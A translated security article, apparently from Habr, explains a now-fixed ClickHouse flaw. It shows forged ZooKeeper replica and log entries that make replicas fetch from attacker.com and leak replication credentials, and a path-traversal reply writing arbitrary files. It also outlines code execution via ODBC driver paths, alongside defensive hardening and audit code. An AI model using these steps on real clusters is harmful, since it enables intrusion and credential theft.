Why should you close the zoo cages? (Lock down your ZooKeeper)

This article tells the story of one very specific vulnerability in the ClickHouse replication protocol, and also shows how the attack surface can be expanded from it.

ClickHouse is a database for storing large volumes of data, and it is most often run with more than one replica. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require write access to it.

The default ZK configuration requires no authentication, so thousands of ZK servers that coordinate Kafka, Hadoop and ClickHouse installations are reachable from the public Internet.

To reduce your attack surface, always configure authentication and authorization (ACLs) when you deploy ZooKeeper.
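As an added example (my own code, not part of the original article or of ZooKeeper/ClickHouse), here is a small helper for exactly that hardening step: it computes the id that ZooKeeper's digest ACL scheme expects, builds the zkCli setAcl line that restricts a subtree to that identity, and audits zkCli getAcl output for entries that let world:anyone modify the tree. The user name, password and the /clickhouse path are placeholders, and the sample getAcl output is constructed.

```python
import base64
import hashlib
import re

# ZooKeeper permission bits (org.apache.zookeeper.ZooDefs.Perms)
PERM_LETTERS = {"r": 1, "w": 2, "c": 4, "d": 8, "a": 16}
# Anything beyond read lets an anonymous client tamper with the tree.
MUTATING = PERM_LETTERS["w"] | PERM_LETTERS["c"] | PERM_LETTERS["d"] | PERM_LETTERS["a"]

# Constructed sample of what `getAcl /clickhouse` prints on an unconfigured ZK.
SAMPLE_OPEN_ACL = "'world,'anyone\n: cdrwa\n"


def digest_id(user: str, password: str) -> str:
    """Id for ZooKeeper's 'digest' ACL scheme: user:base64(sha1("user:password")).
    setAcl takes this hashed form; the client still authenticates with the plain pair."""
    raw = f"{user}:{password}".encode()
    return f"{user}:{base64.b64encode(hashlib.sha1(raw).digest()).decode()}"


def setacl_command(path: str, user: str, password: str, perms: str = "cdrwa") -> str:
    """zkCli command that replaces the ACL on `path` with a single digest entry."""
    return f"setAcl {path} digest:{digest_id(user, password)}:{perms}"


def perms_mask(letters: str) -> int:
    mask = 0
    for ch in letters:
        mask |= PERM_LETTERS[ch]
    return mask


def audit_getacl(output: str) -> list:
    """Parse zkCli `getAcl <path>` output, which prints each entry as two lines:
        'world,'anyone
        : cdrwa
    and return (scheme, id, perms) for entries that allow unauthenticated writes."""
    findings = []
    lines = [line.strip() for line in output.splitlines() if line.strip()]
    for first, second in zip(lines, lines[1:]):
        entry = re.match(r"'(\w+),'(.*)$", first)
        perms = re.match(r":\s*([rwcda]*)$", second)
        if not (entry and perms):
            continue
        scheme, ident, letters = entry.group(1), entry.group(2), perms.group(1)
        if scheme == "world" and ident == "anyone" and perms_mask(letters) & MUTATING:
            findings.append((scheme, ident, letters))
    return findings


if __name__ == "__main__":
    print("open entries:", audit_getacl(SAMPLE_OPEN_ACL))
    print(setacl_command("/clickhouse", "clickhouse", "s3cret"))
```

On the ClickHouse side the matching plain credentials go into the `<identity>user:password</identity>` element of the `<zookeeper>` section of the server configuration, so that every replica authenticates before touching the /clickhouse subtree.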

There are some Java deserialization 0-days around, but instead imagine simply that an attacker can read and write to the ZooKeeper that ClickHouse uses for replication.

When configured in cluster mode, ClickHouse supports distributed DDL queries that pass through ZK; for them, nodes are created under the /clickhouse/task_queue/ddl znode.

For example, if you create a node /clickhouse/task_queue/ddl/query-0001 with the content:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

then the table xxx will be dropped on the cluster servers host1 and host2. Distributed DDL also supports CREATE/ALTER/DROP queries.

Sounds scary? But where would an attacker get the server addresses from?

ClickHouse replication works per table, so when a table is created, a server that will exchange metadata with the other replicas is recorded in ZK. For example, when executing the following query (ZK must be configured; chXX is the replica name, foobar is the table name):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

the columns and metadata nodes are created.

Content of /clickhouse/tables/01-01/foobar/replicas/chXX/host:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Can you connect to this cluster? Yes, if the replication port (TCP/9009) on the chXX-address server is not firewalled and no authentication is configured for replication. How do you get around authentication?

An attacker can create a new replica in ZK simply by copying the content of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the host value.

Content of /clickhouse/tables/01-01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Next, the other replicas must be told that there is a new block of data on the attacker's server which they need to fetch: a node is created in ZK at /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX is a monotonically growing counter, greater than the last entry in the event log):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

where source replica is the name of the attacker's replica created in the previous step, block_id is the data block identifier, and get is the "fetch the block" command (other operations have their own commands).

Then each replica reads the new event from the log and goes to the attacker-controlled server to fetch the data block (the replication protocol is binary and runs over HTTP). The server attacker.com receives requests like:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is the replication authentication data. In some cases this is an account that also has access to the database over the native ClickHouse protocol and over HTTP. As you can see, the attack surface turns out to be much larger because the ZooKeeper used for replication was left unconfigured.

Let's look at the function that fetches a data block from a replica. It is written with full confidence that every replica is under proper control and that the replicas trust each other.

[Figure: the replication fetch function]

The function reads the list of files, then each file's name, size and contents, and writes them to the file system. How data is laid out on the file system deserves a separate description.

There are several subdirectories in /var/lib/clickhouse (the default data directory from the configuration file):

flags - directory for flag files, used for recovery after data loss;
tmp - directory for temporary files;
user_files - file operations in queries (INTO OUTFILE and others) are restricted to this directory;
metadata - sql files with table definitions;
preprocessed_configs - processed configuration files derived from /etc/clickhouse-server;
data - the directory with the data itself; a separate subdirectory is created here for each database (for example /var/lib/clickhouse/data/default).

For each table a subdirectory is created inside the database directory. Each column is a separate file (the exact layout depends on the engine). For example, for the foobar table created by the attacker, the following files are created:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

When processing a data block the replica expects to receive files with these names, and it does not validate the names in any way.

The attentive reader will already have noticed the unsafe concatenation of file_name in the WriteBufferFromFile call. Yes, it lets the attacker write arbitrary content to any file on the file system with the privileges of the clickhouse user. To do that, the attacker-controlled replica returns the following reply to the request (line breaks added for readability: the first 8 bytes are the file count, the single byte \x24 is the file name length (36) in ClickHouse's varint encoding, then the name, then the 8-byte little-endian file size (18), then the contents):

\x01\x00\x00\x00\x00\x00\x00\x00
\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

and after concatenation with ../../../../../../../../../tmp/pwned the file /tmp/pwned is written with the content hellofromzookeeper.
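To make the wire format concrete, here is an added Python example (my own code, not from the article and not ClickHouse's own implementation): it encodes and decodes the DataPartsExchange reply in the layout described above, reproduces the reply from the article byte for byte, and contrasts the pre-fix path handling (plain concatenation) with a check in the spirit of the 19.14.3 fix that refuses file names escaping the part download directory. The part download path is an assumed example path, and the "legitimate" part is constructed.

```python
import posixpath
import struct

# Assumed example: where a replica would stage a part it is fetching.
PART_DOWNLOAD_PATH = "/var/lib/clickhouse/data/default/foobar/tmp_fetch_all_0_0_2/"


def write_varuint(n: int) -> bytes:
    """LEB128 varint, as ClickHouse's writeVarUInt uses for string length prefixes."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)


def read_varuint(buf: bytes, pos: int):
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def encode_part_reply(files: dict) -> bytes:
    """Serialize a DataPartsExchange reply as the 2019-era sender did:
    UInt64 LE file count, then per file: varint-prefixed name, UInt64 LE size, raw bytes."""
    out = struct.pack("<Q", len(files))
    for name, content in files.items():
        name_b = name.encode()
        out += write_varuint(len(name_b)) + name_b
        out += struct.pack("<Q", len(content)) + content
    return out


def decode_part_reply(buf: bytes) -> list:
    """Inverse of encode_part_reply; returns [(file_name, content), ...]."""
    (count,) = struct.unpack_from("<Q", buf, 0)
    pos, files = 8, []
    for _ in range(count):
        nlen, pos = read_varuint(buf, pos)
        name = buf[pos:pos + nlen].decode()
        pos += nlen
        (size,) = struct.unpack_from("<Q", buf, pos)
        pos += 8
        files.append((name, buf[pos:pos + size]))
        pos += size
    return files


def attacker_reply() -> bytes:
    """The reply from the article: one file whose name climbs out of the part directory."""
    return encode_part_reply({"../" * 9 + "tmp/pwned": b"hellofromzookeeper"})


def target_path_unchecked(part_download_path: str, file_name: str) -> str:
    """Pre-fix behaviour: concatenate and open whatever that resolves to."""
    return posixpath.normpath(part_download_path + file_name)


def target_path_checked(part_download_path: str, file_name: str) -> str:
    """Hardened variant: the resolved path must stay under the part download
    directory, otherwise the whole part is refused."""
    base = posixpath.normpath(part_download_path)
    target = posixpath.normpath(posixpath.join(base, file_name))
    if not target.startswith(base + "/"):
        raise ValueError(f"file name escapes part directory: {file_name!r}")
    return target


def plan_writes(reply: bytes, part_download_path: str, checked: bool) -> list:
    """Where each file of a reply would land on disk under the given receiver policy."""
    resolve = target_path_checked if checked else target_path_unchecked
    return [(resolve(part_download_path, name), content)
            for name, content in decode_part_reply(reply)]


def reply_escapes_part_dir(reply: bytes, part_download_path: str) -> bool:
    """True if the hardened receiver would reject this reply."""
    try:
        plan_writes(reply, part_download_path, checked=True)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(attacker_reply())
    print(plan_writes(attacker_reply(), PART_DOWNLOAD_PATH, checked=False))
    print("rejected by hardened receiver:",
          reply_escapes_part_dir(attacker_reply(), PART_DOWNLOAD_PATH))
```

Note that the check normalizes the joined path before comparing, so an absolute file name or one that climbs past the root is caught the same way as a relative `../` chain; comparing against `base + "/"` also rejects a sibling directory whose name merely starts with the same prefix.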

There are many ways to turn an arbitrary file write into remote code execution (RCE).

External dictionaries to RCE

In older versions, the directory with the ClickHouse configuration was owned by the default clickhouse user. The configuration files are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs; when they change, they are re-read. With write access to /etc/clickhouse-server an attacker can create their own external dictionary of the executable type and then run arbitrary code. Current ClickHouse versions do not grant these permissions by default, but if a server was upgraded step by step, those permissions may have been carried over. If you maintain a ClickHouse cluster, check the permissions on the configuration directory: it must be owned by root.

ODBC to RCE

When the package is installed, a clickhouse user is created, but its home directory /nonexistent is not. However, when using external dictionaries, or for other reasons, administrators create the /nonexistent directory and give the clickhouse user write access to it (SSZB, i.e. self-inflicted; translator's note).

ClickHouse supports ODBC and can connect to other databases. In ODBC you can specify the path to the database driver library (.so). Old versions of ClickHouse allowed this directly in the query, but a stricter check of the connection string has since been added to odbc-bridge, so the driver path can no longer be given from the query. But what if the attacker can write to the home directory using the vulnerability described above?

Let's create a file ~/.odbc.ini with content like this:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

and then, on running SELECT * FROM odbc('DSN=lalala', 'test', 'test'); the library test.so is loaded and we get RCE (thanks to buglloc for the tip).
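Both escalation paths above depend on directories the service user must not be able to write: the configuration directory (which must be owned by root) and the clickhouse user's home directory (which the package leaves absent). As an added example, not from the article, here is a small Python audit of exactly those two conditions from the service user's point of view; the production entry point assumes the Debian-style clickhouse account and /etc/clickhouse-server, and the offline demo runs the same checks on a scratch directory.

```python
import grp
import os
import pwd
import stat
import tempfile


def user_can_write(st: os.stat_result, uid: int, gids: set) -> bool:
    """Can an unprivileged process with this uid/gids modify the inode?
    Ownership counts as writable: the owner can always chmod it back."""
    if st.st_uid == uid:
        return True
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_paths(paths: list, uid: int, gids: set) -> dict:
    """Classify each path as 'missing', 'writable' or 'ok' for the given user."""
    result = {}
    for p in paths:
        try:
            st = os.stat(p)
        except FileNotFoundError:
            result[p] = "missing"
            continue
        result[p] = "writable" if user_can_write(st, uid, gids) else "ok"
    return result


def audit_clickhouse_host(user: str = "clickhouse") -> dict:
    """On a real host: the config directory must not be writable by the service
    user, and its home directory (/nonexistent by default) should stay missing."""
    pw = pwd.getpwnam(user)
    gids = {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if user in g.gr_mem}
    return audit_paths(["/etc/clickhouse-server", pw.pw_dir], pw.pw_uid, gids)


def demo() -> dict:
    """Offline run on a scratch directory, seen from a uid that does not own it."""
    with tempfile.TemporaryDirectory() as d:
        foreign_uid, foreign_gids = os.getuid() + 1, set()
        os.chmod(d, 0o777)
        loose = audit_paths([d], foreign_uid, foreign_gids)[d]
        os.chmod(d, 0o755)
        tight = audit_paths([d], foreign_uid, foreign_gids)[d]
        home = os.path.join(d, "nonexistent")
        missing = audit_paths([home], foreign_uid, foreign_gids)[home]
    return {"0o777": loose, "0o755": tight, "missing": missing}


if __name__ == "__main__":
    print(demo())
```

For the home directory, "missing" is the desired state; a "writable" result for /etc/clickhouse-server means the external-dictionary path above is open, and a "writable" home directory means the ODBC path is.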

These and other vulnerabilities were fixed in ClickHouse version 19.14.3. Take care of your ClickHouse and your ZooKeepers!

Source: www.habr.com
